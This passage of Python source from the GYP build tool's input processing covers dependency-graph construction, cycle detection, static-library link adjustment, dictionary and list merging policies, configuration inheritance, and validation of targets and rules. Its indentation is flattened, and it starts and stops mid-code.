return [seen.setdefault(e, e) for e in l if e not in seen]
def RemoveDuplicateDependencies(targets):
"""Makes sure every dependency appears only once in all targets's dependency
lists."""
for target_name, target_dict in targets.items():
for dependency_key in dependency_sections:
dependencies = target_dict.get(dependency_key, [])
if dependencies:
target_dict[dependency_key] = Unify(dependencies)
def Filter(l, item):
"""Removes item from l."""
res = {}
return [res.setdefault(e, e) for e in l if e != item]
def RemoveSelfDependencies(targets):
"""Remove self dependencies from targets that have the prune_self_dependency
variable set."""
for target_name, target_dict in targets.items():
for dependency_key in dependency_sections:
dependencies = target_dict.get(dependency_key, [])
if dependencies:
for t in dependencies:
if t == target_name:
if (
targets[t]
.get("variables", {})
.get("prune_self_dependency", 0)
):
target_dict[dependency_key] = Filter(
dependencies, target_name
)
def RemoveLinkDependenciesFromNoneTargets(targets):
"""Remove dependencies having the 'link_dependency' attribute from the 'none'
targets."""
for target_name, target_dict in targets.items():
for dependency_key in dependency_sections:
dependencies = target_dict.get(dependency_key, [])
if dependencies:
for t in dependencies:
if target_dict.get("type", None) == "none":
if targets[t].get("variables", {}).get("link_dependency", 0):
target_dict[dependency_key] = Filter(
target_dict[dependency_key], t
)
class DependencyGraphNode(object):
"""
Attributes:
ref: A reference to an object that this DependencyGraphNode represents.
dependencies: List of DependencyGraphNodes on which this one depends.
dependents: List of DependencyGraphNodes that depend on this one.
"""
class CircularException(GypError):
pass
def __init__(self, ref):
self.ref = ref
self.dependencies = []
self.dependents = []
def __repr__(self):
return "<DependencyGraphNode: %r>" % self.ref
def FlattenToList(self):
# flat_list is the sorted list of dependencies - actually, the list items
# are the "ref" attributes of DependencyGraphNodes. Every target will
# appear in flat_list after all of its dependencies, and before all of its
# dependents.
flat_list = OrderedSet()
def ExtractNodeRef(node):
"""Extracts the object that the node represents from the given node."""
return node.ref
# in_degree_zeros is the list of DependencyGraphNodes that have no
# dependencies not in flat_list. Initially, it is a copy of the children
# of this node, because when the graph was built, nodes with no
# dependencies were made implicit dependents of the root node.
in_degree_zeros = sorted(self.dependents[:], key=ExtractNodeRef)
while in_degree_zeros:
# Nodes in in_degree_zeros have no dependencies not in flat_list, so they
# can be appended to flat_list. Take these nodes out of in_degree_zeros
# as work progresses, so that the next node to process from the list can
# always be accessed at a consistent position.
node = in_degree_zeros.pop()
flat_list.add(node.ref)
# Look at dependents of the node just added to flat_list. Some of them
# may now belong in in_degree_zeros.
for node_dependent in sorted(node.dependents, key=ExtractNodeRef):
is_in_degree_zero = True
# TODO: We want to check through the
# node_dependent.dependencies list but if it's long and we
# always start at the beginning, then we get O(n^2) behaviour.
for node_dependent_dependency in sorted(
node_dependent.dependencies, key=ExtractNodeRef
):
if node_dependent_dependency.ref not in flat_list:
# The dependent one or more dependencies not in flat_list. There
# will be more chances to add it to flat_list when examining
# it again as a dependent of those other dependencies, provided
# that there are no cycles.
is_in_degree_zero = False
break
if is_in_degree_zero:
# All of the dependent's dependencies are already in flat_list. Add
# it to in_degree_zeros where it will be processed in a future
# iteration of the outer loop.
in_degree_zeros += [node_dependent]
return list(flat_list)
def FindCycles(self):
"""
Returns a list of cycles in the graph, where each cycle is its own list.
"""
results = []
visited = set()
def Visit(node, path):
for child in node.dependents:
if child in path:
results.append([child] + path[: path.index(child) + 1])
elif child not in visited:
visited.add(child)
Visit(child, [child] + path)
visited.add(self)
Visit(self, [self])
return results
def DirectDependencies(self, dependencies=None):
"""Returns a list of just direct dependencies."""
if dependencies is None:
dependencies = []
for dependency in self.dependencies:
# Check for None, corresponding to the root node.
if dependency.ref and dependency.ref not in dependencies:
dependencies.append(dependency.ref)
return dependencies
def _AddImportedDependencies(self, targets, dependencies=None):
"""Given a list of direct dependencies, adds indirect dependencies that
other dependencies have declared to export their settings.
This method does not operate on self. Rather, it operates on the list
of dependencies in the |dependencies| argument. For each dependency in
that list, if any declares that it exports the settings of one of its
own dependencies, those dependencies whose settings are "passed through"
are added to the list. As new items are added to the list, they too will
be processed, so it is possible to import settings through multiple levels
of dependencies.
This method is not terribly useful on its own, it depends on being
"primed" with a list of direct dependencies such as one provided by
DirectDependencies. DirectAndImportedDependencies is intended to be the
public entry point.
"""
if dependencies is None:
dependencies = []
index = 0
while index < len(dependencies):
dependency = dependencies[index]
dependency_dict = targets[dependency]
# Add any dependencies whose settings should be imported to the list
# if not already present. Newly-added items will be checked for
# their own imports when the list iteration reaches them.
# Rather than simply appending new items, insert them after the
# dependency that exported them. This is done to more closely match
# the depth-first method used by DeepDependencies.
add_index = 1
for imported_dependency in dependency_dict.get(
"export_dependent_settings", []
):
if imported_dependency not in dependencies:
dependencies.insert(index + add_index, imported_dependency)
add_index = add_index + 1
index = index + 1
return dependencies
def DirectAndImportedDependencies(self, targets, dependencies=None):
"""Returns a list of a target's direct dependencies and all indirect
dependencies that a dependency has advertised settings should be exported
through the dependency for.
"""
dependencies = self.DirectDependencies(dependencies)
return self._AddImportedDependencies(targets, dependencies)
def DeepDependencies(self, dependencies=None):
"""Returns an OrderedSet of all of a target's dependencies, recursively."""
if dependencies is None:
# Using a list to get ordered output and a set to do fast "is it
# already added" checks.
dependencies = OrderedSet()
for dependency in self.dependencies:
# Check for None, corresponding to the root node.
if dependency.ref is None:
continue
if dependency.ref not in dependencies:
dependency.DeepDependencies(dependencies)
dependencies.add(dependency.ref)
return dependencies
def _LinkDependenciesInternal(
self, targets, include_shared_libraries, dependencies=None, initial=True
):
"""Returns an OrderedSet of dependency targets that are linked
into this target.
This function has a split personality, depending on the setting of
|initial|. Outside callers should always leave |initial| at its default
setting.
When adding a target to the list of dependencies, this function will
recurse into itself with |initial| set to False, to collect dependencies
that are linked into the linkable target for which the list is being built.
If |include_shared_libraries| is False, the resulting dependencies will not
include shared_library targets that are linked into this target.
"""
if dependencies is None:
# Using a list to get ordered output and a set to do fast "is it
# already added" checks.
dependencies = OrderedSet()
# Check for None, corresponding to the root node.
if self.ref is None:
return dependencies
# It's kind of sucky that |targets| has to be passed into this function,
# but that's presently the easiest way to access the target dicts so that
# this function can find target types.
if "target_name" not in targets[self.ref]:
raise GypError("Missing 'target_name' field in target.")
if "type" not in targets[self.ref]:
raise GypError(
"Missing 'type' field in target %s" % targets[self.ref]["target_name"]
)
target_type = targets[self.ref]["type"]
is_linkable = target_type in linkable_types
if initial and not is_linkable:
# If this is the first target being examined and it's not linkable,
# return an empty list of link dependencies, because the link
# dependencies are intended to apply to the target itself (initial is
# True) and this target won't be linked.
return dependencies
# Don't traverse 'none' targets if explicitly excluded.
if target_type == "none" and not targets[self.ref].get(
"dependencies_traverse", True
):
dependencies.add(self.ref)
return dependencies
# Executables, mac kernel extensions, windows drivers and loadable modules
# are already fully and finally linked. Nothing else can be a link
# dependency of them, there can only be dependencies in the sense that a
# dependent target might run an executable or load the loadable_module.
if not initial and target_type in (
"executable",
"loadable_module",
"mac_kernel_extension",
"windows_driver",
):
return dependencies
# Shared libraries are already fully linked. They should only be included
# in |dependencies| when adjusting static library dependencies (in order to
# link against the shared_library's import lib), but should not be included
# in |dependencies| when propagating link_settings.
# The |include_shared_libraries| flag controls which of these two cases we
# are handling.
if (
not initial
and target_type == "shared_library"
and not include_shared_libraries
):
return dependencies
# The target is linkable, add it to the list of link dependencies.
if self.ref not in dependencies:
dependencies.add(self.ref)
if initial or not is_linkable:
# If this is a subsequent target and it's linkable, don't look any
# further for linkable dependencies, as they'll already be linked into
# this target linkable. Always look at dependencies of the initial
# target, and always look at dependencies of non-linkables.
for dependency in self.dependencies:
dependency._LinkDependenciesInternal(
targets, include_shared_libraries, dependencies, False
)
return dependencies
def DependenciesForLinkSettings(self, targets):
"""
Returns a list of dependency targets whose link_settings should be merged
into this target.
"""
# TODO(sbaig) Currently, chrome depends on the bug that shared libraries'
# link_settings are propagated. So for now, we will allow it, unless the
# 'allow_sharedlib_linksettings_propagation' flag is explicitly set to
# False. Once chrome is fixed, we can remove this flag.
include_shared_libraries = targets[self.ref].get(
"allow_sharedlib_linksettings_propagation", True
)
return self._LinkDependenciesInternal(targets, include_shared_libraries)
def DependenciesToLinkAgainst(self, targets):
"""
Returns a list of dependency targets that are linked into this target.
"""
return self._LinkDependenciesInternal(targets, True)
def BuildDependencyList(targets):
# Create a DependencyGraphNode for each target. Put it into a dict for easy
# access.
dependency_nodes = {}
for target, spec in targets.items():
if target not in dependency_nodes:
dependency_nodes[target] = DependencyGraphNode(target)
# Set up the dependency links. Targets that have no dependencies are treated
# as dependent on root_node.
root_node = DependencyGraphNode(None)
for target, spec in targets.items():
target_node = dependency_nodes[target]
dependencies = spec.get("dependencies")
if not dependencies:
target_node.dependencies = [root_node]
root_node.dependents.append(target_node)
else:
for dependency in dependencies:
dependency_node = dependency_nodes.get(dependency)
if not dependency_node:
raise GypError(
"Dependency '%s' not found while "
"trying to load target %s" % (dependency, target)
)
target_node.dependencies.append(dependency_node)
dependency_node.dependents.append(target_node)
flat_list = root_node.FlattenToList()
# If there's anything left unvisited, there must be a circular dependency
# (cycle).
if len(flat_list) != len(targets):
if not root_node.dependents:
# If all targets have dependencies, add the first target as a dependent
# of root_node so that the cycle can be discovered from root_node.
target = next(iter(targets))
target_node = dependency_nodes[target]
target_node.dependencies.append(root_node)
root_node.dependents.append(target_node)
cycles = []
for cycle in root_node.FindCycles():
paths = [node.ref for node in cycle]
cycles.append("Cycle: %s" % " -> ".join(paths))
raise DependencyGraphNode.CircularException(
"Cycles in dependency graph detected:\n" + "\n".join(cycles)
)
return [dependency_nodes, flat_list]
def VerifyNoGYPFileCircularDependencies(targets):
# Create a DependencyGraphNode for each gyp file containing a target. Put
# it into a dict for easy access.
dependency_nodes = {}
for target in targets:
build_file = gyp.common.BuildFile(target)
if build_file not in dependency_nodes:
dependency_nodes[build_file] = DependencyGraphNode(build_file)
# Set up the dependency links.
for target, spec in targets.items():
build_file = gyp.common.BuildFile(target)
build_file_node = dependency_nodes[build_file]
target_dependencies = spec.get("dependencies", [])
for dependency in target_dependencies:
try:
dependency_build_file = gyp.common.BuildFile(dependency)
except GypError as e:
gyp.common.ExceptionAppend(
e, "while computing dependencies of .gyp file %s" % build_file
)
raise
if dependency_build_file == build_file:
# A .gyp file is allowed to refer back to itself.
continue
dependency_node = dependency_nodes.get(dependency_build_file)
if not dependency_node:
raise GypError("Dependency '%s' not found" % dependency_build_file)
if dependency_node not in build_file_node.dependencies:
build_file_node.dependencies.append(dependency_node)
dependency_node.dependents.append(build_file_node)
# Files that have no dependencies are treated as dependent on root_node.
root_node = DependencyGraphNode(None)
for build_file_node in dependency_nodes.values():
if len(build_file_node.dependencies) == 0:
build_file_node.dependencies.append(root_node)
root_node.dependents.append(build_file_node)
flat_list = root_node.FlattenToList()
# If there's anything left unvisited, there must be a circular dependency
# (cycle).
if len(flat_list) != len(dependency_nodes):
if not root_node.dependents:
# If all files have dependencies, add the first file as a dependent
# of root_node so that the cycle can be discovered from root_node.
file_node = next(iter(dependency_nodes.values()))
file_node.dependencies.append(root_node)
root_node.dependents.append(file_node)
cycles = []
for cycle in root_node.FindCycles():
paths = [node.ref for node in cycle]
cycles.append("Cycle: %s" % " -> ".join(paths))
raise DependencyGraphNode.CircularException(
"Cycles in .gyp file dependency graph detected:\n" + "\n".join(cycles)
)
def DoDependentSettings(key, flat_list, targets, dependency_nodes):
# key should be one of all_dependent_settings, direct_dependent_settings,
# or link_settings.
for target in flat_list:
target_dict = targets[target]
build_file = gyp.common.BuildFile(target)
if key == "all_dependent_settings":
dependencies = dependency_nodes[target].DeepDependencies()
elif key == "direct_dependent_settings":
dependencies = dependency_nodes[target].DirectAndImportedDependencies(
targets
)
elif key == "link_settings":
dependencies = dependency_nodes[target].DependenciesForLinkSettings(targets)
else:
raise GypError(
"DoDependentSettings doesn't know how to determine "
"dependencies for " + key
)
for dependency in dependencies:
dependency_dict = targets[dependency]
if key not in dependency_dict:
continue
dependency_build_file = gyp.common.BuildFile(dependency)
MergeDicts(
target_dict, dependency_dict[key], build_file, dependency_build_file
)
def AdjustStaticLibraryDependencies(
flat_list, targets, dependency_nodes, sort_dependencies
):
# Recompute target "dependencies" properties. For each static library
# target, remove "dependencies" entries referring to other static libraries,
# unless the dependency has the "hard_dependency" attribute set. For each
# linkable target, add a "dependencies" entry referring to all of the
# target's computed list of link dependencies (including static libraries
# if no such entry is already present.
for target in flat_list:
target_dict = targets[target]
target_type = target_dict["type"]
if target_type == "static_library":
if "dependencies" not in target_dict:
continue
target_dict["dependencies_original"] = target_dict.get("dependencies", [])[
:
]
# A static library should not depend on another static library unless
# the dependency relationship is "hard," which should only be done when
# a dependent relies on some side effect other than just the build
# product, like a rule or action output. Further, if a target has a
# non-hard dependency, but that dependency exports a hard dependency,
# the non-hard dependency can safely be removed, but the exported hard
# dependency must be added to the target to keep the same dependency
# ordering.
dependencies = dependency_nodes[target].DirectAndImportedDependencies(
targets
)
index = 0
while index < len(dependencies):
dependency = dependencies[index]
dependency_dict = targets[dependency]
# Remove every non-hard static library dependency and remove every
# non-static library dependency that isn't a direct dependency.
if (
dependency_dict["type"] == "static_library"
and not dependency_dict.get("hard_dependency", False)
) or (
dependency_dict["type"] != "static_library"
and dependency not in target_dict["dependencies"]
):
# Take the dependency out of the list, and don't increment index
# because the next dependency to analyze will shift into the index
# formerly occupied by the one being removed.
del dependencies[index]
else:
index = index + 1
# Update the dependencies. If the dependencies list is empty, it's not
# needed, so unhook it.
if len(dependencies) > 0:
target_dict["dependencies"] = dependencies
else:
del target_dict["dependencies"]
elif target_type in linkable_types:
# Get a list of dependency targets that should be linked into this
# target. Add them to the dependencies list if they're not already
# present.
link_dependencies = dependency_nodes[target].DependenciesToLinkAgainst(
targets
)
for dependency in link_dependencies:
if dependency == target:
continue
if "dependencies" not in target_dict:
target_dict["dependencies"] = []
if dependency not in target_dict["dependencies"]:
target_dict["dependencies"].append(dependency)
# Sort the dependencies list in the order from dependents to dependencies.
# e.g. If A and B depend on C and C depends on D, sort them in A, B, C, D.
# Note: flat_list is already sorted in the order from dependencies to
# dependents.
if sort_dependencies and "dependencies" in target_dict:
target_dict["dependencies"] = [
dep
for dep in reversed(flat_list)
if dep in target_dict["dependencies"]
]
# Initialize this here to speed up MakePathRelative.
exception_re = re.compile(r"""["']?[-/$<>^]""")
def MakePathRelative(to_file, fro_file, item):
# If item is a relative path, it's relative to the build file dict that it's
# coming from. Fix it up to make it relative to the build file dict that
# it's going into.
# Exception: any |item| that begins with these special characters is
# returned without modification.
# / Used when a path is already absolute (shortcut optimization;
# such paths would be returned as absolute anyway)
# $ Used for build environment variables
# - Used for some build environment flags (such as -lapr-1 in a
# "libraries" section)
# < Used for our own variable and command expansions (see ExpandVariables)
# > Used for our own variable and command expansions (see ExpandVariables)
# ^ Used for our own variable and command expansions (see ExpandVariables)
#
# "/' Used when a value is quoted. If these are present, then we
# check the second character instead.
#
if to_file == fro_file or exception_re.match(item):
return item
else:
# TODO(dglazkov) The backslash/forward-slash replacement at the end is a
# temporary measure. This should really be addressed by keeping all paths
# in POSIX until actual project generation.
ret = os.path.normpath(
os.path.join(
gyp.common.RelativePath(
os.path.dirname(fro_file), os.path.dirname(to_file)
),
item,
)
).replace("\\", "/")
if item.endswith("/"):
ret += "/"
return ret
def MergeLists(to, fro, to_file, fro_file, is_paths=False, append=True):
# Python documentation recommends objects which do not support hash
# set this value to None. Python library objects follow this rule.
def is_hashable(val):
return val.__hash__
# If x is hashable, returns whether x is in s. Else returns whether x is in l.
def is_in_set_or_list(x, s, l):
if is_hashable(x):
return x in s
return x in l
prepend_index = 0
# Make membership testing of hashables in |to| (in particular, strings)
# faster.
hashable_to_set = set(x for x in to if is_hashable(x))
for item in fro:
singleton = False
if type(item) in (str, int):
# The cheap and easy case.
if is_paths:
to_item = MakePathRelative(to_file, fro_file, item)
else:
to_item = item
if not (type(item) is str and item.startswith("-")):
# Any string that doesn't begin with a "-" is a singleton - it can
# only appear once in a list, to be enforced by the list merge append
# or prepend.
singleton = True
elif type(item) is dict:
# Make a copy of the dictionary, continuing to look for paths to fix.
# The other intelligent aspects of merge processing won't apply because
# item is being merged into an empty dict.
to_item = {}
MergeDicts(to_item, item, to_file, fro_file)
elif type(item) is list:
# Recurse, making a copy of the list. If the list contains any
# descendant dicts, path fixing will occur. Note that here, custom
# values for is_paths and append are dropped; those are only to be
# applied to |to| and |fro|, not sublists of |fro|. append shouldn't
# matter anyway because the new |to_item| list is empty.
to_item = []
MergeLists(to_item, item, to_file, fro_file)
else:
raise TypeError(
"Attempt to merge list item of unsupported type "
+ item.__class__.__name__
)
if append:
# If appending a singleton that's already in the list, don't append.
# This ensures that the earliest occurrence of the item will stay put.
if not singleton or not is_in_set_or_list(to_item, hashable_to_set, to):
to.append(to_item)
if is_hashable(to_item):
hashable_to_set.add(to_item)
else:
# If prepending a singleton that's already in the list, remove the
# existing instance and proceed with the prepend. This ensures that the
# item appears at the earliest possible position in the list.
while singleton and to_item in to:
to.remove(to_item)
# Don't just insert everything at index 0. That would prepend the new
# items to the list in reverse order, which would be an unwelcome
# surprise.
to.insert(prepend_index, to_item)
if is_hashable(to_item):
hashable_to_set.add(to_item)
prepend_index = prepend_index + 1
def MergeDicts(to, fro, to_file, fro_file):
# I wanted to name the parameter "from" but it's a Python keyword...
for k, v in fro.items():
# It would be nice to do "if not k in to: to[k] = v" but that wouldn't give
# copy semantics. Something else may want to merge from the |fro| dict
# later, and having the same dict ref pointed to twice in the tree isn't
# what anyone wants considering that the dicts may subsequently be
# modified.
if k in to:
bad_merge = False
if type(v) in (str, int):
if type(to[k]) not in (str, int):
bad_merge = True
elif not isinstance(v, type(to[k])):
bad_merge = True
if bad_merge:
raise TypeError(
"Attempt to merge dict value of type "
+ v.__class__.__name__
+ " into incompatible type "
+ to[k].__class__.__name__
+ " for key "
+ k
)
if type(v) in (str, int):
# Overwrite the existing value, if any. Cheap and easy.
is_path = IsPathSection(k)
if is_path:
to[k] = MakePathRelative(to_file, fro_file, v)
else:
to[k] = v
elif type(v) is dict:
# Recurse, guaranteeing copies will be made of objects that require it.
if k not in to:
to[k] = {}
MergeDicts(to[k], v, to_file, fro_file)
elif type(v) is list:
# Lists in dicts can be merged with different policies, depending on
# how the key in the "from" dict (k, the from-key) is written.
#
# If the from-key has ...the to-list will have this action
# this character appended:... applied when receiving the from-list:
# = replace
# + prepend
# ? set, only if to-list does not yet exist
# (none) append
#
# This logic is list-specific, but since it relies on the associated
# dict key, it's checked in this dict-oriented function.
ext = k[-1]
append = True
if ext == "=":
list_base = k[:-1]
lists_incompatible = [list_base, list_base + "?"]
to[list_base] = []
elif ext == "+":
list_base = k[:-1]
lists_incompatible = [list_base + "=", list_base + "?"]
append = False
elif ext == "?":
list_base = k[:-1]
lists_incompatible = [list_base, list_base + "=", list_base + "+"]
else:
list_base = k
lists_incompatible = [list_base + "=", list_base + "?"]
# Some combinations of merge policies appearing together are meaningless.
# It's stupid to replace and append simultaneously, for example. Append
# and prepend are the only policies that can coexist.
for list_incompatible in lists_incompatible:
if list_incompatible in fro:
raise GypError(
"Incompatible list policies " + k + " and " + list_incompatible
)
if list_base in to:
if ext == "?":
# If the key ends in "?", the list will only be merged if it doesn't
# already exist.
continue
elif type(to[list_base]) is not list:
# This may not have been checked above if merging in a list with an
# extension character.
raise TypeError(
"Attempt to merge dict value of type "
+ v.__class__.__name__
+ " into incompatible type "
+ to[list_base].__class__.__name__
+ " for key "
+ list_base
+ "("
+ k
+ ")"
)
else:
to[list_base] = []
# Call MergeLists, which will make copies of objects that require it.
# MergeLists can recurse back into MergeDicts, although this will be
# to make copies of dicts (with paths fixed), there will be no
# subsequent dict "merging" once entering a list because lists are
# always replaced, appended to, or prepended to.
is_paths = IsPathSection(list_base)
MergeLists(to[list_base], v, to_file, fro_file, is_paths, append)
else:
raise TypeError(
"Attempt to merge dict value of unsupported type "
+ v.__class__.__name__
+ " for key "
+ k
)
def MergeConfigWithInheritance(
new_configuration_dict, build_file, target_dict, configuration, visited
):
# Skip if previously visted.
if configuration in visited:
return
# Look at this configuration.
configuration_dict = target_dict["configurations"][configuration]
# Merge in parents.
for parent in configuration_dict.get("inherit_from", []):
MergeConfigWithInheritance(
new_configuration_dict,
build_file,
target_dict,
parent,
visited + [configuration],
)
# Merge it into the new config.
MergeDicts(new_configuration_dict, configuration_dict, build_file, build_file)
# Drop abstract.
if "abstract" in new_configuration_dict:
del new_configuration_dict["abstract"]
def SetUpConfigurations(target, target_dict):
# key_suffixes is a list of key suffixes that might appear on key names.
# These suffixes are handled in conditional evaluations (for =, +, and ?)
# and rules/exclude processing (for ! and /). Keys with these suffixes
# should be treated the same as keys without.
key_suffixes = ["=", "+", "?", "!", "/"]
build_file = gyp.common.BuildFile(target)
# Provide a single configuration by default if none exists.
# TODO(mark): Signal an error if default_configurations exists but
# configurations does not.
if "configurations" not in target_dict:
target_dict["configurations"] = {"Default": {}}
if "default_configuration" not in target_dict:
concrete = [
i
for (i, config) in target_dict["configurations"].items()
if not config.get("abstract")
]
target_dict["default_configuration"] = sorted(concrete)[0]
merged_configurations = {}
configs = target_dict["configurations"]
for (configuration, old_configuration_dict) in configs.items():
# Skip abstract configurations (saves work only).
if old_configuration_dict.get("abstract"):
continue
# Configurations inherit (most) settings from the enclosing target scope.
# Get the inheritance relationship right by making a copy of the target
# dict.
new_configuration_dict = {}
for (key, target_val) in target_dict.items():
key_ext = key[-1:]
if key_ext in key_suffixes:
key_base = key[:-1]
else:
key_base = key
if key_base not in non_configuration_keys:
new_configuration_dict[key] = gyp.simple_copy.deepcopy(target_val)
# Merge in configuration (with all its parents first).
MergeConfigWithInheritance(
new_configuration_dict, build_file, target_dict, configuration, []
)
merged_configurations[configuration] = new_configuration_dict
# Put the new configurations back into the target dict as a configuration.
for configuration in merged_configurations.keys():
target_dict["configurations"][configuration] = merged_configurations[
configuration
]
# Now drop all the abstract ones.
configs = target_dict["configurations"]
target_dict["configurations"] = {
k: v for k, v in configs.items() if not v.get("abstract")
}
# Now that all of the target's configurations have been built, go through
# the target dict's keys and remove everything that's been moved into a
# "configurations" section.
delete_keys = []
for key in target_dict:
key_ext = key[-1:]
if key_ext in key_suffixes:
key_base = key[:-1]
else:
key_base = key
if key_base not in non_configuration_keys:
delete_keys.append(key)
for key in delete_keys:
del target_dict[key]
# Check the configurations to see if they contain invalid keys.
for configuration in target_dict["configurations"].keys():
configuration_dict = target_dict["configurations"][configuration]
for key in configuration_dict.keys():
if key in invalid_configuration_keys:
raise GypError(
"%s not allowed in the %s configuration, found in "
"target %s" % (key, configuration, target)
)
def ProcessListFiltersInDict(name, the_dict):
"""Process regular expression and exclusion-based filters on lists.
An exclusion list is in a dict key named with a trailing "!", like
"sources!". Every item in such a list is removed from the associated
main list, which in this example, would be "sources". Removed items are
placed into a "sources_excluded" list in the dict.
Regular expression (regex) filters are contained in dict keys named with a
trailing "/", such as "sources/" to operate on the "sources" list. Regex
filters in a dict take the form:
'sources/': [ ['exclude', '_(linux|mac|win)\\.cc$'],
['include', '_mac\\.cc$'] ],
The first filter says to exclude all files ending in _linux.cc, _mac.cc, and
_win.cc. The second filter then includes all files ending in _mac.cc that
are now or were once in the "sources" list. Items matching an "exclude"
filter are subject to the same processing as would occur if they were listed
by name in an exclusion list (ending in "!"). Items matching an "include"
filter are brought back into the main list if previously excluded by an
exclusion list or exclusion regex filter. Subsequent matching "exclude"
patterns can still cause items to be excluded after matching an "include".
"""
# Look through the dictionary for any lists whose keys end in "!" or "/".
# These are lists that will be treated as exclude lists and regular
# expression-based exclude/include lists. Collect the lists that are
# needed first, looking for the lists that they operate on, and assemble
# then into |lists|. This is done in a separate loop up front, because
# the _included and _excluded keys need to be added to the_dict, and that
# can't be done while iterating through it.
lists = []
del_lists = []
for key, value in the_dict.items():
operation = key[-1]
if operation != "!" and operation != "/":
continue
if type(value) is not list:
raise ValueError(
name + " key " + key + " must be list, not " + value.__class__.__name__
)
list_key = key[:-1]
if list_key not in the_dict:
# This happens when there's a list like "sources!" but no corresponding
# "sources" list. Since there's nothing for it to operate on, queue up
# the "sources!" list for deletion now.
del_lists.append(key)
continue
if type(the_dict[list_key]) is not list:
value = the_dict[list_key]
raise ValueError(
name
+ " key "
+ list_key
+ " must be list, not "
+ value.__class__.__name__
+ " when applying "
+ {"!": "exclusion", "/": "regex"}[operation]
)
if list_key not in lists:
lists.append(list_key)
# Delete the lists that are known to be unneeded at this point.
for del_list in del_lists:
del the_dict[del_list]
for list_key in lists:
the_list = the_dict[list_key]
# Initialize the list_actions list, which is parallel to the_list. Each
# item in list_actions identifies whether the corresponding item in
# the_list should be excluded, unconditionally preserved (included), or
# whether no exclusion or inclusion has been applied. Items for which
# no exclusion or inclusion has been applied (yet) have value -1, items
# excluded have value 0, and items included have value 1. Includes and
# excludes override previous actions. All items in list_actions are
# initialized to -1 because no excludes or includes have been processed
# yet.
list_actions = list((-1,) * len(the_list))
exclude_key = list_key + "!"
if exclude_key in the_dict:
for exclude_item in the_dict[exclude_key]:
for index, list_item in enumerate(the_list):
if exclude_item == list_item:
# This item matches the exclude_item, so set its action to 0
# (exclude).
list_actions[index] = 0
# The "whatever!" list is no longer needed, dump it.
del the_dict[exclude_key]
regex_key = list_key + "/"
if regex_key in the_dict:
for regex_item in the_dict[regex_key]:
[action, pattern] = regex_item
pattern_re = re.compile(pattern)
if action == "exclude":
# This item matches an exclude regex, so set its value to 0 (exclude).
action_value = 0
elif action == "include":
# This item matches an include regex, so set its value to 1 (include).
action_value = 1
else:
# This is an action that doesn't make any sense.
raise ValueError(
"Unrecognized action "
+ action
+ " in "
+ name
+ " key "
+ regex_key
)
for index, list_item in enumerate(the_list):
if list_actions[index] == action_value:
# Even if the regex matches, nothing will change so continue (regex
# searches are expensive).
continue
if pattern_re.search(list_item):
# Regular expression match.
list_actions[index] = action_value
# The "whatever/" list is no longer needed, dump it.
del the_dict[regex_key]
# Add excluded items to the excluded list.
#
# Note that exclude_key ("sources!") is different from excluded_key
# ("sources_excluded"). The exclude_key list is input and it was already
# processed and deleted; the excluded_key list is output and it's about
# to be created.
excluded_key = list_key + "_excluded"
if excluded_key in the_dict:
raise GypError(
name + " key " + excluded_key + " must not be present prior "
" to applying exclusion/regex filters for " + list_key
)
excluded_list = []
# Go backwards through the list_actions list so that as items are deleted,
# the indices of items that haven't been seen yet don't shift. That means
# that things need to be prepended to excluded_list to maintain them in the
# same order that they existed in the_list.
for index in range(len(list_actions) - 1, -1, -1):
if list_actions[index] == 0:
# Dump anything with action 0 (exclude). Keep anything with action 1
# (include) or -1 (no include or exclude seen for the item).
excluded_list.insert(0, the_list[index])
del the_list[index]
# If anything was excluded, put the excluded list into the_dict at
# excluded_key.
if len(excluded_list) > 0:
the_dict[excluded_key] = excluded_list
# Now recurse into subdicts and lists that may contain dicts.
for key, value in the_dict.items():
if type(value) is dict:
ProcessListFiltersInDict(key, value)
elif type(value) is list:
ProcessListFiltersInList(key, value)
def ProcessListFiltersInList(name, the_list):
for item in the_list:
if type(item) is dict:
ProcessListFiltersInDict(name, item)
elif type(item) is list:
ProcessListFiltersInList(name, item)
def ValidateTargetType(target, target_dict):
"""Ensures the 'type' field on the target is one of the known types.
Arguments:
target: string, name of target.
target_dict: dict, target spec.
Raises an exception on error.
"""
VALID_TARGET_TYPES = (
"executable",
"loadable_module",
"static_library",
"shared_library",
"mac_kernel_extension",
"none",
"windows_driver",
)
target_type = target_dict.get("type", None)
if target_type not in VALID_TARGET_TYPES:
raise GypError(
"Target %s has an invalid target type '%s'. "
"Must be one of %s." % (target, target_type, "/".join(VALID_TARGET_TYPES))
)
if (
target_dict.get("standalone_static_library", 0)
and not target_type == "static_library"
):
raise GypError(
"Target %s has type %s but standalone_static_library flag is"
" only valid for static_library type." % (target, target_type)
)
def ValidateSourcesInTarget(target, target_dict, build_file, duplicate_basename_check):
if not duplicate_basename_check:
return
if target_dict.get("type", None) != "static_library":
return
sources = target_dict.get("sources", [])
basenames = {}
for source in sources:
name, ext = os.path.splitext(source)
is_compiled_file = ext in [".c", ".cc", ".cpp", ".cxx", ".m", ".mm", ".s", ".S"]
if not is_compiled_file:
continue
basename = os.path.basename(name) # Don't include extension.
basenames.setdefault(basename, []).append(source)
error = ""
for basename, files in basenames.items():
if len(files) > 1:
error += " %s: %s\n" % (basename, " ".join(files))
if error:
print(
"static library %s has several files with the same basename:\n" % target
+ error
+ "libtool on Mac cannot handle that. Use "
"--no-duplicate-basename-check to disable this validation."
)
raise GypError("Duplicate basenames in sources section, see list above")
def ValidateRulesInTarget(target, target_dict, extra_sources_for_rules):
"""Ensures that the rules sections in target_dict are valid and consistent,
and determines which sources they apply to.
Arguments:
target: string, name of target.
target_dict: dict, target spec containing "rules" and "sources" lists.
extra_sources_for_rules: a list of keys to scan for rule matches in
addition to 'sources'.
"""
# Dicts to map between values found in rules' 'rule_name' and 'extension'
# keys and the rule dicts themselves.
rule_names = {}
rule_extensions = {}
rules = target_dict.get("rules", [])
for rule in rules:
# Make sure that there's no conflict among rule names and extensions.
rule_name = rule["rule_name"]
if rule_name in rule_names:
raise GypError(
"rule %s exists in duplicate, target %s" % (rule_name, target)
)
rule_names[rule_name] = rule
rule_extension = rule["extension"]
if rule_extension.startswith("."):
rule_extension = rule_extension[1:]
if rule_extension in rule_extensions:
raise GypError(
(
"extension %s associated with multiple rules, "
+ "target %s rules %s and %s"
)
% (
rule_extension,
target,
rule_extensions[rule_extension]["rule_name"],
rule_name,
)
)
rule_extensions[rule_extension] = rule
# Make sure rule_sources isn't already there. It's going to be
# created below if needed.
if "rule_sources" in rule:
raise GypError(
"rule_sources must not exist in input, target %s rule %s"
% (target, rule_name)
)
rule_sources = []
source_keys = ["sources"]
source_keys.extend(extra_sources_for_rules)
for source_key in source_keys:
